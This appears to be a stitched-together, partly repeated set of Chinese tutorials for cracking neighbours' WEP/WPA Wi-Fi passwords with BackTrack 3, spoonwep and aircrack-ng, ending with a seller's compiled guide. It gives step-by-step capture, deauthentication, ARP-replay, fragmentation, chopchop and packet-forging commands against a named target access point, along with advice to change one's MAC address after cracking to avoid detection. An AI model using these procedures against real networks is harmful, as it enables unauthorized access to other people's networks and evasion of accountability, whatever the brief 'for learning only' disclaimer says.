<网卡ID>即可输入命令,并回车,即可看到下面的信息:解释一下几个名称BSSID:扫描到的无线路由的MAC地址,这个地址破解的时候需要用到PWR:无线路由的信号强度Beacons:向此路由发送的数据包的数量#Data:网卡抓到的数据包的数量CH: 无线路由所在的信道ENC与CIPHER,这个是无线路由的加密方式ESSID:无线路由的SSID的名称我们这次举的例子,要破解的,必须为ENC:wep, CIPHER:wep,如上图的YEROC,就是非常合适的一个破解的对象至于wpa加密的,由于不能抓到足够的数据包,不知道能不能破解,有兴趣的,你可以自己去试现在我们就要查看,那个无线路由的#Data那一栏的数值变化比较快,数据包比较多,这样我们才能破解我们看到,YEROC已经有17个数据包了,那我们就破解它3.开始破解,再打开一个命令行模式,什么?不知道怎么打开命令行模式,自己看文章上半部分去打开命令行窗口,运行:spoonwep然后回车打开spoonwep后Victim MAC:这个栏里,输入我们要破解的无线路由的MAC码,也就是MAC地址注意:是要破解的无线路由的MAC码,不是你无线网卡的MAC码Net Card中,选择刚才运行airodump-ng -w 123 eth1 这个命令中用到的无线网卡我的为eth1,我就选择了eth1Channel:选择要破解的无线路由所在的信道,YEROC为六,我就选择了六Inj Rate,为默认即可Launch那个栏位,选择下拉的第二项0841 REPLAY ATTACK然后点击Launch按钮,就开始破解了开始破解后,要抓到六万到十万的数据包,才能破解,我这个抓了四十分钟才抓够数据包,才破解的。
bt3使用方法
图04-查看网卡信息
为了避免信息泄露,我把我的MAC地址和要破解的AP(Access Point,接入点)的MAC地址的后2个字节都隐藏了~呵呵~
Beacons——这个是路由器对外发包,可能是SSID广播,我也不太清楚,如果看到这个数据在涨,就代表这个AP还行,一般是1秒涨20~30吧。太慢了就有可能因为信号的原因破解失败。
#Data——这个数据最最重要,这个代表可以用于破解的包,一般这个数据到达1W+,一般的64位的WEP密码就能够破解了。之后我们要做的,就是等待他到达1W,如果数据增长很缓慢(几分钟才增加1),那就只好用另一种方法了,就是发包攻击,这个在后面有介绍。
首先,你需要的工具:
软件:
① BackTrack 3(简称BT3)
BT3有光盘版,硬盘版还有U盘版,由于本本基本上可以刻碟,我就懒得弄那些U盘版,硬盘版了,直接刻了张碟,所以这篇教程使用光盘版。
下载地址:
U盘版:
光盘版:
硬件:
② 一台笔记本,或者台式机配无线网卡。
如果是笔记本,在设备管理器中查看一下你的网卡类型,我的是Intel 3945ABG的,现在市面上大部分笔记本都是用的这个网卡,所以,这篇教程主要针对这个网卡,如果不是,可能也能够破解成功,我也就没有测试了,台式机用的无线网卡同理,也有支持BT3的。
输入完这个命令后,这个窗口就不用关了,它要一直抓包的,我们称之为1号窗口。
bt3教程
第三在步直接点击搜索网络,选择要破解的网络,POW这里是信号的强度。
这里的四个是四种攻击方式,在教程的图片中有写明了。
网卡有问题了,要重启下这个程序,其实正真破解的时候只要按个spoonwep就可以了,就这样等个几分钟就可以了,中间的速度快慢是按你接受到信号的强度有关,
关于破解WPA的方法和和这个是差不多的,如果有不懂的地方请看教程里的图片。
首先启动程序,在第一个选项里我们要选---BT3 Graphics mode (VESA KDE)
进入程序之后在左下角的这个黑色四方形就是我们要用到的命令窗口,当然如果你忘记了命令或者是不知道怎么操作了的话可以在桌面上有个叫SYSTEM的图标这里按进去,点到这个里面的这个存储介质里面就可以看到U盘,在U盘就可以看到教程和图片。
注意!!在破解密码后最好是把自己的MAC隐藏或者更改,注意避免上网高峰期。。本人不负任何责任!!
进这个软件前要到bios里设置一下USB(或者CD)启动项,U盘的选择USB-HDD放在第一个,光盘的CD放第一个,ASUS的电脑是在HDD里面将USB的调到上面就可以了,SONY的电脑有几个型号不支持USB启动就没法使用,,进BIOS里面设置的话你就看那个有BIOS或BOOT这几个字就进那个里面,一定是在哪里面调的
第一步就是按这个 ifconfig -a这个命令查看网卡。这些其实也可以不用去管的,我们现在来打开SPOONWEP2这个程序。
第二步就是按spoonwep 就可以了,我们接着是要选择要使用的网卡端口,注意,一般情况下第二个选项一般都是选第一个,除非你的网卡是Atheros的网卡,那就要选第二个,第三个选看一下你的无线网卡型号,在命令窗口里输入airmon-ng这个命令,这个是查看可支持的网卡。
BT3破解和制作U盘版BT3教程
BT3破解和制作U盘版BT3教程一分钟制作 BT3 U盘版方便,快捷简单光盘版BT3, 大概694MB,直接刻盘,然后用光盘引导,即可进入bt3,连接为:http://ftp.heanet.ie/mirrors/backtrack/bt3-final.isoU盘版Bt3,大概783MB,连接为:http://cesium.di.uminho.pt/pub/backtrack/bt3final_usb.iso准备工作:一张1G以上的U盘,或是SD卡,或是TF卡,当然,TF或SD卡的话,你要有读卡器才能在电脑上读出来,建议将U盘格式化成FAT32,这样比较节省空间,至于为什么节省空间,FAT32与FAT格式的比较请您自己百度去,这里不多说了格式化完成后,此U盘为空的U盘插入到电脑USB口1.下载U盘版bt3的文件地址为:http://cesium.di.uminho.pt/pub/backtrack/bt3final_usb.iso文件大概为 783MB2.将此ISO文件加载到虚拟光驱中,在虚拟光驱中,得到如下文件:Snap1.jpg当然,你也可以用winrar解压到目录中,估计应该没啥问题,因为空间问题,我就不想解压了我是直接加栽到虚拟光驱来用的,省空间,无需解压3.将虚拟光驱中的文件也就是BT3,BOOT这两件文件夹copy到U盘中去Snap2.jpg4.点击开始-运行,输入CMD, 然后回车,进入命令行模式Snap4.jpg输入U盘的盘符,我的为I:,然后回车输入 cd boot 回车输入 bootinst.bat 回车,就会开始制作BT3setup1.JPG开始制作时,会出现这样的画面,大概意思就是,此操作将会重写U盘的MBR(即引导区),如果此分区是您的一个硬盘上的分区,那您的Windows系统将会启动不了,请小心,按X键中止操作,按其他任意键继续制作我就是在U盘上操作的,所以不用理会,按任意键就可以了setup2.JPG上面的图,是制作完成后的提示,设置引导记录成功,按任意键退出制作制作的过程很快,大概不到十秒,其他,他只是重新写了一下U盘的引导区就OK了到此为止,此U盘就可以引导系统进去bt3了然后,升级下SPOONWEP2版本上面ISO文件中的SPOONWEP版本太低,我把SPOONWEP2.lzm上传到blog里面了;大家也可以到CSDN上面去下载;这个文件拷贝粘贴到U盘的BT3\modules\即可当然,您的电脑如何设置成U盘启动就是您的问题了,我的是USBHDD启动的----------------------------------------------------我是下流的分割线------------------------------------------------------破解:引导系统进入BT3的选择画面,选择后面带有KDE的BT3即可,至于为什么选择这个KDE是啥东西,我不知道,我也不想知道,如果您有性趣,请去自行百度1.进入bt3桌面后,需要用到的就是命令行模式,其实也不难,注意,我们要启动bt3的命令行状态,点击下面这个图标就会启动bt3的命令行状态xiaobai0000000.JPG就是上图中,画蓝圈的那个图标,我们所有的操作,都需要点击此图标2.点击图标,进入命令行状态,输入命令:ifconfig -a此命令,就是列出你电脑中的网卡,如果没有列出,那说明是不支持了如果列出了,说明支持,也不一定能抓包xiaobai16666666.JPG上图就是,输入完命令,回车后看到的信息,注意图中画蓝圈的部分那里显示的是你网卡的MAC码,我的就是 16-E6结尾的,可以看到说明是支持我的网卡的,我的无线网卡是:intel 2915ABG ,BT3支持 2915ABG抓包内至的网卡是以 eth0, eth1,eth2.....此类的IDUSB的网卡是以 rausb0, rausb1,rausb2....此类的ID下面,就要以eth1,我的内至网卡来抓包2.再打开一个命令窗口,不知道怎么打开的,请去看文章上半部分打开后,输入命令:airodump-ng -w 123 eth1然后回车注意:你自己的无线网卡的ID可能是 Rausb0, 或是 eth0, eth1命令格式是:airodump-ng -w 123 <网卡ID>即可xiaobai2.jpg输入命令,并回车,即可看到下面的信息:xiaobai3.jpg解释一下几个名称BSSID:扫描到的无线路由的MAC地址,这个地址破解的时候需要用到PWR:无线路由的信号强度Beacons:向此路由发送的数据包的数量#Data:网卡抓到的数据包的数量CH: 无线路由所在的信道ENC与CIPHER,这个是无线路由的加密方式ESSID:无线路由的SSID的名称我们这次举的例子,要破解的,必须为ENC:wep, CIPHER:wep,如上图的YEROC,就是非常合适的一个破解的对象至于wpa加密的,由于不能抓到足够的数据包,不知道能不能破解,有兴趣的,你可以自己去试试现在我们就要查看,那个无线路由的 #Data那一栏的数值变化比较快,数据包比较多,这样我们才能破解我们看到,YEROC已经有17个数据包了,那我们就破解它3.开始破解,再打开一个命令行模式,什么?不知道怎么打开命令行模式,抽S,自己看文章上半部分去打开命令行窗口,运行:spoonwep然后回车xiaobai5.jpgxiaobai6.jpg打开spoonwep后Victim MAC:这个栏里,输入我们要破解的无线路由的MAC码,也就是MAC地址注意:是要破解的无线路由的MAC码,不是你无线网卡的MAC码Net Card中,选择刚才运行 airodump-ng -w 123 eth1 这个命令中用到的无线网卡我的为eth1,我就选择了eth1Channel:选择要破解的无线路由所在的信道,YEROC为六,我就选择了六Inj Rate,为默认即可Launch那个栏位,选择下拉的第二项0841 REPLAY ATTACK然后点击 Launch按钮 ,就开始破解了Yeroc.jpg开始破解后,要抓到六万到十万的数据包,才能破解我这个抓了四十分钟才抓够数据包,才破解的此时,由于在运行,你看不到数据包的变化没关系此时,再打开一个命令行窗口,输入 airodump-ng -w 123 eth1 然后回车你就会看到#Data 的数据包在不断的变化,因为运行spoonwep时,刚才那个airodump-ng 的窗口会数据显示所以,开始破解后,再运行一次:airodump-ng -w 123 eth1 你就可以观察数据包数量变化的速度也就会大概估计大概多长时间才能破解完成了如果很慢,可以在睡前就开机来运算,进行破解如果很快,在洗个澡的时间就可以破解了这就需要你观察破解时,数据包变化的速度,然后再安排个时间来破解了Over,全文完BT3下无线破解实战Intel3945ABG在BT3下无线网络密码破解===================================网络上关于无线网络破解的工具有很多,我手头上就有几个:WinaircrackPack, CommView_for_wifi, BT3。
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
BT3 破解无线WEP/WPA 教程声明:任何不经别人同意而进入别人网络都是非法和不道德的行为.本教程用于学习和交流,如要实验请拿自已的AP 开刀!本教程非本人原 创,是采用了网上各位兄弟的大作编辑而成.如有版权问题请联系本人.本人是各无线论坛ID:水草,淘宝ID:水草GG,此教程只是将部分内容简易化,易于新 手操作,如有不正确的地方请指出.欢迎各位到论坛提问咨询. 如果需要购买破解装备可以到我的淘宝店看看 此教程主要是作为赠品送给各位淘宝买家的.1-1.下载BT3 FINAL版,光盘版下载地址 刻盘或者做硬盘虚拟机启动,就不详细说明了.虚拟机要启用USB设备,对于新手开始不推荐使用.BackTrack 3 Final 光盘版 Name:: bt3-final.iso Size: 695 MB Download: .uoc.gr/mirrors/linux/backtrack/bt3-final.iso MD5: f79cbfbcd25147df32f5f6dfa287c2d9 SHA1: 471f0e41931366517ea8bffe910fb09a815e42c71-2.启动有可能要求输入用户名和密码. 用户名:root 密码:toor ,进入图形界面:startx .有的电脑启动BT3 后黑屏:xconf 再输入startx 有的电脑实在不能进入桌面窗口的时候你也可以直接在提示符下输入各破解命令,同时可用alt+f1 打开一个 shell,alt+f2 打开第二个shell,alt+f3 打开第三个等.关闭窗口用PRINT SCREEN 键.ifconfig –a 记住自己网卡的MAC,不同的网卡不同的电脑接口可能不一样.WLG-1500SMA和760N一般为eth?,这里的?是数字. 下面图片里或者文章命令里的wifi0,rausb0,eth1等是各种网卡接口,要换成换成自己的.1-3.查看网卡接口,输入:三恩论坛 1-4.加载网卡 输入命令: Ifconfig –a eth11-5.查找目标: 当然也可以在WINDOWS下用软件搜索要破解的AP,这样可以省略这步. 输入命令: airodump-ng eth1通过扫描获得你要破解的AP 的MAC 和SSID 还有是否有客户端等信息.三恩论坛 看上图中CH是频道,PWR是信号,理论是越高越好.WUSB54G要求40以上,WG111 V2,760N,1500SMA8 以上.ESSID为网络名称,ENC是加密方式,AUTH,DATA为需要抓取的破解数据,一般要30000以上. BSSID为AP的MAC,STATION为客户端的MAC,如果要破的AP MAC在下面没有显示就是没有客户端记录下这些信息后,请关闭此窗口.不然会后面无客户端建立虚拟连接时信道会出现一直在跳转的情况.注:有时可以修改自己网卡的MAC 地址,一般不用,可以跳过.命令中的wifi0改为自己的网卡接口1-6.激活网卡的Monitor 模式并工作在需要破解的AP的频道输入: airmon-ng start eth1 6 这里的数字6是需要破解的频道三恩论坛 注:不同的网卡有不同的加载方式1-7. 输入截取数据包命令(截取6信道的ivs 数据包,并保存名为name.ivs)输入命令: airodump-ng --ivs -w <File name> -c <Channel> eth1(其中file name 是获取的ivs 的保存文件的名字, channel是频道,你根据实际修改)以上步骤是通用的在抓包到一定数量后可以输入破解命令,一般需要30000以上.如果包的数量够密码很快出来了输入命令: aircrack-ng -n 64 -b <Ap Mac> <File name>-01.ivs (64指64位加密,128是指128位加密)下面根据有无客户端等各种情况指定命令,以加快抓包速度,提 高破解效率,当然你如果有时间可以等待! 二. 有客户端WEP 破解分a.b.c三种情况 a.有客户端,且合法客户端产生大量有效的数据,能直接获得大量IVS .直接用aircrack-ng 破解输入命令: aircrack-ng -n 64 -b <Ap Mac> <File name>-01.ivs (64指64位加密,128是指128位加密)b.有客户端,合法客户端只能产生少量ivs 数据,就需要注入攻击加速产生大量ivs .三恩论坛 只要有少量的数据就可能获得arp 请求包,则可用arp 注入模式的-3 模式通过不断向AP 发送同 样的arp 请求包,来进行注入式攻击. 思路:用aireplay-ng 的arp 注入方式获得大量的ivs 输入命令: aireplay-ng -3 -b <Ap Mac> -h <合法客户端 Mac>注:这一步可能时间会长一点,因为需要等到ARP .c.有客户端,但是客户端根本不在通信,不能产生ARP 包.-3 注入模式不成功, 输入命令: aireplay-ng -0 10 –a (AP MAC) –c (客户端 MAC) eth?三恩论坛 2-a-b-c.现在,只要一个命令就搞定,输入下面的命令,注意将wifi改为自己的网卡接口三恩论坛 Wesside-ng 这个命令其实就是一个-5 碎片注入,fragmentation 构造注入包,-3arp 注入,最后PTW 破解这 样一个思路.B.无客户端开放式WEP 破解b-0.接1-7步因为是无客户端,所以第一步就需要和AP 之间建立一个虚拟连接.这是非常关键的一步.为让AP 接受数据包, 必须使自己的网卡和AP 关联.如果没有关联的话,目标AP 将忽略所有从你网卡发送的数据包,IVS 数据将不 会产生.输入命令: aireplay-ng -1 0 -e <SSID> -a <Ap Mac> -h <My Mac> eth1三恩论坛 注意这步一定要完成才可以继续下面的步骤.如果回显虚拟伪装连接不成功,不能成功的原因很多,具体有如下几种:1,目标AP 做了MAC 地址过滤 2,你离目标AP 物理距离太远 3,对方使用了WPA 加密 4,网卡,AP 可能不兼容,网卡没有使用和AP 一样的工作频道注:遇有不规则的essid 可用引号将essid 引起 来比如,'jack chen'.虚拟连接不成功可做如下尝试: 1 2 -e ssid省略掉 降低网卡的速率重新进行连接Iwconfig eth? Rate 2M参数说明:rate 后面跟连接的速率,可以从小往大设置做尝试连接.后面的单位M 必须为大写b-1.第一种破解方式:-2 交互攻击模式,接步骤b-0 建立虚拟连接后直接用-2 交互攻击模式,这个模式集合了抓包和提取数据,发包注入三种能力.第八步:抓 包,提数据和发包攻击b-1-1.输入: aireplay-ng -2 -p 0841 -c ffffffffffff -b <ApMac> -h <MyMac> eth1发包成功后可得到足够的ivs ,然后用aircrack-ng 破解.三恩论坛 成功后如上图截获了一个可以直接进行注入的数据包,并回显Use this packet. b-1-2.按 然后开始 发包攻击,date 飞快涨.当获得足够的ivs 以后就可破解了. b-2 第二种破解方式:接步骤b-0第八步:利用-5 碎片攻击模式获得一个可用的包含密钥是数据文件(xor 文件)第九步:然后通过数据包制 造程序Packetforge-ng 提取xor 文件中的PRGA 伪造一个arp 包,第十步:最后利用交互式攻击模式-2 发包 攻击.b-2-1.采用碎片包攻击模式-5,获得一个PRGA 数据包(xor 文件). 输入: aireplay-ng -5 –b (AP MAC) –h (my mac) eth?三恩论坛 如顺利,将得到一个可利用的数据包如上图,系统将回显Use this packet ? b-2-2.输入y 回车,将得到一个至关重要的xor 文件.这一步生成的xor 文件将被我们用来产生arp 数据包.b-2-3.再输入ls 查看当前目录,你将看到刚才生成的一个后缀名为xor 的文件.三恩论坛 用数据包制造程序packetforge-ng 将上面获得的PRGA 数据包伪造成可利用的ARP 注入包。
其工作原理就是使目标AP 重新广播包,当AP 重广播时,一个新的IVS 将产生,我们就是利用这个来破解。
b-2-4.输入: packetforge-ng -0 –a (AP MAC) –h (my MAC) –k 255.255.255.255 –i255.255.255.255 –y name-xor –w myarp参数说明:-y (filename )是用来读取PRGA 的文件-w (filename)将arp 包写入文件,我用的文件名是myarp系统回显:Wrote packet to: mrarp采用交互模式-2,发包注入攻击。
最高不超过1024b-2-6.输入y,回车攻击开始这时,前面的抓包窗口上的data 将迅速增加。
到数据增加到1.5 万以上时。
采用aircrack-ng 来进行破解b-3.第三种破解方式, 接步骤b-0第八步:利用-4 的Chopchop 攻击模式获得一个可用的包含密钥数据文件(xor 文件)第九步:通过数据包制造程序Packetforge-ng 提取xor 文件中的PRGA 伪造一个arp 包第十步:最后利用交互式攻击模式-2 发包攻击。
第八步:采用-4 的Chopchop 攻击模式获得一个包含密钥数据的xor 文件b-3-1.输入:aireplay-ng -4 –b (AP MAC) –h (自己的MAC) eth0参数说明:-b:设置需要破解的AP 的mac -h:设置用于连接的无线网卡的mac(自己网卡),eth0改为自己的网卡接口.顺利将得到一个可利用的数据包,按将利用此数据包生产一个xor 文件如上图所示得到一个名为replay_dec-0523-075615 的xor 文件,b-3-2.通过数据包制造程序Packetforge-ng 提取上面xor 文件来伪造一个arp 包如上图,成功生成一个名为myarp 的可用来注入的arp 数据包。
b-3-3.最后利用交互式攻击模式-2 发包攻击。
rausb0为网卡接口后直接用aircrack 进行破解破解命令:注:在破解无客户端的时候经常会遇到有些AP,尝试了各种注入攻击模式都无法成功注入,date 一直为0。